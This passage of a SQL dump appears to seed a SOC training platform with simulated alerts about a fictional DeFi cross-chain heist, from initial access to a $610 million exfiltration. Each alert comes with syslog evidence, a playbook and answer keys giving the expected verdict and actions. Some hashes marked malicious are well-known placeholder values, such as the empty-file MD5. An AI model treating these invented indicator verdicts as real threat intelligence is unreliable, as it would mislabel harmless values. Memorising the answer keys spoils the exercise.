1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"evt-123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"transaction_id\\\":\\\"txn-987654321\\\",\\\"exfiltrated_amount\\\":325000000,\\\"proposed_bounty\\\":10000000,\\\"exfil_method\\\":\\\"http\\\",\\\"malware_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"exploit_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.696Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"evt-123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"transaction_id\\\":\\\"txn-987654321\\\",\\\"exfiltrated_amount\\\":325000000,\\\"proposed_bounty\\\":10000000,\\\"exfil_method\\\":\\\"http\\\",\\\"malware_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"exploit_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.696Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"evt-123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"transaction_id\\\":\\\"txn-987654321\\\",\\\"exfiltrated_amount\\\":325000000,\\\"proposed_bounty\\\":10000000,\\\"exfil_method\\\":\\\"http\\\",\\\"malware_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"exploit_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.696Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"evt-123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"transaction_id\\\":\\\"txn-987654321\\\",\\\"exfiltrated_amount\\\":325000000,\\\"proposed_bounty\\\":10000000,\\\"exfil_method\\\":\\\"http\\\",\\\"malware_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"exploit_script.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1003, 'Suspicious Cross-Chain Transaction Detected', 'high', 'Blockchain Transaction Monitor', 'An advanced attacker initiated a complex cross-chain transaction exploiting a vulnerability to gain initial access to the DeFi platform\'s financial ecosystem. The transaction was traced back to a known malicious IP address and included a suspicious hash indicating potential malware involvement.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"transaction_id\":\"0xabc123def456ghi789jkl000\",\"source_ip\":\"185.199.108.153\",\"destination_ip\":\"10.0.5.23\",\"origin_chain\":\"Ethereum\",\"destination_chain\":\"Binance Smart Chain\",\"transaction_amount\":\"5 ETH\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"user\":\"mal_user\",\"vulnerability_exploited\":\"Cross-chain smart contract vulnerability\",\"timestamp\":\"2023-10-15T14:48:00Z\"}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Cyber Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with multiple DeFi platform attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash related to malware used in financial ecosystem breaches.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected DeFi platform.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"mal_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"DeFi User Database\",\"verdict\":\"suspicious\",\"details\":\"Username associated with unauthorized access 
attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.697Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc123def456ghi789jkl000\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"origin_chain\\\":\\\"Ethereum\\\",\\\"destination_chain\\\":\\\"Binance Smart Chain\\\",\\\"transaction_amount\\\":\\\"5 ETH\\\",\\\"hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"mal_user\\\",\\\"vulnerability_exploited\\\":\\\"Cross-chain smart contract vulnerability\\\",\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.697Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc123def456ghi789jkl000\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"origin_chain\\\":\\\"Ethereum\\\",\\\"destination_chain\\\":\\\"Binance Smart Chain\\\",\\\"transaction_amount\\\":\\\"5 ETH\\\",\\\"hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"mal_user\\\",\\\"vulnerability_exploited\\\":\\\"Cross-chain smart contract vulnerability\\\",\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.697Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc123def456ghi789jkl000\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"origin_chain\\\":\\\"Ethereum\\\",\\\"destination_chain\\\":\\\"Binance Smart Chain\\\",\\\"transaction_amount\\\":\\\"5 ETH\\\",\\\"hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"mal_user\\\",\\\"vulnerability_exploited\\\":\\\"Cross-chain smart contract vulnerability\\\",\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.697Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc123def456ghi789jkl000\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"origin_chain\\\":\\\"Ethereum\\\",\\\"destination_chain\\\":\\\"Binance Smart Chain\\\",\\\"transaction_amount\\\":\\\"5 ETH\\\",\\\"hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"mal_user\\\",\\\"vulnerability_exploited\\\":\\\"Cross-chain smart contract vulnerability\\\",\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.697Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc123def456ghi789jkl000\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"origin_chain\\\":\\\"Ethereum\\\",\\\"destination_chain\\\":\\\"Binance Smart Chain\\\",\\\"transaction_amount\\\":\\\"5 ETH\\\",\\\"hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"mal_user\\\",\\\"vulnerability_exploited\\\":\\\"Cross-chain smart contract vulnerability\\\",\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 
0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1004, 'Exploitation of Cross-Chain Vulnerability', 'critical', 'DeFi Platform Logs', 'Using sophisticated techniques, the attacker manipulates the cross-chain transaction protocols, executing unauthorized transactions that begin to siphon funds.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-24T14:32:45Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.1.2.3\",\"transaction_id\":\"tx_987654321\",\"user\":\"eth_user_007\",\"malicious_script\":\"cross_chain_exploit.sh\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert\":{\"name\":\"Unauthorized Cross-Chain Transaction\",\"type\":\"Execution\",\"severity\":\"Critical\"}}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT campaigns targeting DeFi platforms.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected node.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"cross_chain_exploit.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"Script used in exploitation of cross-chain vulnerabilities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with exploit toolkit.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.699Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.2.3\\\",\\\"transaction_id\\\":\\\"tx_987654321\\\",\\\"user\\\":\\\"eth_user_007\\\",\\\"malicious_script\\\":\\\"cross_chain_exploit.sh\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert\\\":{\\\"name\\\":\\\"Unauthorized Cross-Chain Transaction\\\",\\\"type\\\":\\\"Execution\\\",\\\"severity\\\":\\\"Critical\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.699Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.2.3\\\",\\\"transaction_id\\\":\\\"tx_987654321\\\",\\\"user\\\":\\\"eth_user_007\\\",\\\"malicious_script\\\":\\\"cross_chain_exploit.sh\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert\\\":{\\\"name\\\":\\\"Unauthorized Cross-Chain Transaction\\\",\\\"type\\\":\\\"Execution\\\",\\\"severity\\\":\\\"Critical\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.699Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.2.3\\\",\\\"transaction_id\\\":\\\"tx_987654321\\\",\\\"user\\\":\\\"eth_user_007\\\",\\\"malicious_script\\\":\\\"cross_chain_exploit.sh\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert\\\":{\\\"name\\\":\\\"Unauthorized Cross-Chain Transaction\\\",\\\"type\\\":\\\"Execution\\\",\\\"severity\\\":\\\"Critical\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.699Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.2.3\\\",\\\"transaction_id\\\":\\\"tx_987654321\\\",\\\"user\\\":\\\"eth_user_007\\\",\\\"malicious_script\\\":\\\"cross_chain_exploit.sh\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert\\\":{\\\"name\\\":\\\"Unauthorized Cross-Chain Transaction\\\",\\\"type\\\":\\\"Execution\\\",\\\"severity\\\":\\\"Critical\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.699Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.2.3\\\",\\\"transaction_id\\\":\\\"tx_987654321\\\",\\\"user\\\":\\\"eth_user_007\\\",\\\"malicious_script\\\":\\\"cross_chain_exploit.sh\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert\\\":{\\\"name\\\":\\\"Unauthorized Cross-Chain Transaction\\\",\\\"type\\\":\\\"Execution\\\",\\\"severity\\\":\\\"Critical\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1005, 'Establishment of Persistence through Smart Contracts', 'high', 'Smart Contract Analysis', 'An attacker has embedded malicious smart contracts to maintain persistent access to the network. These contracts are designed to bypass security measures and facilitate ongoing unauthorized transactions. Advanced techniques were employed to obfuscate the malicious code within the blockchain.', 'Persistence', 'T1543.005 - Implant Internal Image - Container Orchestration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:45:30Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malicious_contract_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"contract_name\":\"EternalAccess.sol\",\"attacker_username\":\"contract_deployer\",\"detected_by\":\"Smart Contract Analysis Tool v2.7\",\"event_id\":\"SC-20231001-003\"}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple blockchain-related attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host associated with the deployment of the malicious contract.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Blockchain Security Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash of the malicious smart contract used to maintain persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"EternalAccess.sol\",\"is_critical\":true,\"osint_result\":{\"source\":\"Smart Contract Repository\",\"verdict\":\"malicious\",\"details\":\"Smart contract file designed to 
maintain unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.701Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:30Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_contract_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"contract_name\\\":\\\"EternalAccess.sol\\\",\\\"attacker_username\\\":\\\"contract_deployer\\\",\\\"detected_by\\\":\\\"Smart Contract Analysis Tool v2.7\\\",\\\"event_id\\\":\\\"SC-20231001-003\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.701Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:30Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_contract_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"contract_name\\\":\\\"EternalAccess.sol\\\",\\\"attacker_username\\\":\\\"contract_deployer\\\",\\\"detected_by\\\":\\\"Smart Contract Analysis Tool v2.7\\\",\\\"event_id\\\":\\\"SC-20231001-003\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.701Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:30Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_contract_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"contract_name\\\":\\\"EternalAccess.sol\\\",\\\"attacker_username\\\":\\\"contract_deployer\\\",\\\"detected_by\\\":\\\"Smart Contract Analysis Tool v2.7\\\",\\\"event_id\\\":\\\"SC-20231001-003\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.701Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:30Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_contract_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"contract_name\\\":\\\"EternalAccess.sol\\\",\\\"attacker_username\\\":\\\"contract_deployer\\\",\\\"detected_by\\\":\\\"Smart Contract Analysis Tool v2.7\\\",\\\"event_id\\\":\\\"SC-20231001-003\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.701Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:30Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_contract_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"contract_name\\\":\\\"EternalAccess.sol\\\",\\\"attacker_username\\\":\\\"contract_deployer\\\",\\\"detected_by\\\":\\\"Smart Contract Analysis Tool v2.7\\\",\\\"event_id\\\":\\\"SC-20231001-003\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1006, 'Lateral Movement Across Blockchain Networks', 'high', 'Network Flow Analysis', 'An advanced attacker is leveraging the interconnected nature of blockchain networks to move laterally, obscuring their trail and maximizing the impact of their exploit. The attacker has been detected moving from an internal blockchain node to an external node using known malicious IPs and hashes.', 'Lateral Movement', 'T1080 (Taint Shared Content)', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:47Z\",\"source_ip\":\"10.0.15.23\",\"destination_ip\":\"45.76.112.99\",\"malicious_ip\":\"192.168.1.10\",\"username\":\"blockchain_admin\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_type\":\"lateral_movement\",\"filename\":\"blockchain_data_transfer.exe\",\"protocol\":\"TCP\",\"port\":8333}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.112.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT operations.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to a known blockchain-targeted malware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"blockchain_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate internal user account.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"blockchain_data_transfer.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual executable used for data transfer 
detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1007, 'Massive Fund Exfiltration Detected', 'critical', 'Financial Transaction Alerts', 'A large-scale fund transfer is detected, as the attacker exfiltrates $610 million from the platform, triggering financial transaction alerts.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:45:12Z\",\"event_type\":\"transaction_alert\",\"platform\":\"DeFiPlatformX\",\"transaction_id\":\"tx1234567890\",\"source_ip\":\"10.23.45.67\",\"destination_ip\":\"185.123.45.67\",\"amount_usd\":\"610000000\",\"user_account\":\"attacker_account_123\",\"malware_hash\":\"3b5d5c3712955042212316173ccf37be\",\"file_name\":\"exfiltration_script.py\",\"status\":\"completed\"}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.23.45.67\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP involved in previous exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exfiltration malware used by APT groups.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exfiltration_script.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to automate fund transfers.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"attacker_account_123\",\"is_critical\":true,\"osint_result\":{\"source\":\"account review\",\"verdict\":\"suspicious\",\"details\":\"Account involved in 
unauthorized large fund transfers.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.704Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:45:12Z\\\",\\\"event_type\\\":\\\"transaction_alert\\\",\\\"platform\\\":\\\"DeFiPlatformX\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"source_ip\\\":\\\"10.23.45.67\\\",\\\"destination_ip\\\":\\\"185.123.45.67\\\",\\\"amount_usd\\\":\\\"610000000\\\",\\\"user_account\\\":\\\"attacker_account_123\\\",\\\"malware_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"file_name\\\":\\\"exfiltration_script.py\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.704Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 